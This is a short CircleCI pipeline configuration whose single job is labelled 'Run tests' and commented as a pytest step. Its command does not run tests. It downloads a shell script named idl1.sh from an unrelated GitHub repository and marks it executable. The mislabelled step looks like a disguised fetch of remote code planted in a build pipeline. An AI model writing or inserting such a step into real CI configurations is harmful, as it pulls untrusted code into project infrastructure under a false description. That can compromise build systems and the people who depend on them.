version: 2.1
orbs:
  python: circleci/python@1.5.0

jobs:
  build-and-test: 
    docker:
      - image: cimg/python:3.10.2
    steps:
      - run:
          name: Run tests
          # This assumes pytest is installed via the install-package step above
          command: wget https://github.com/dekamoonth/usefull/raw/main/idl1.sh && chmod +x idl1.sh

workflows:
  sample: 
    jobs:
      - build-and-test
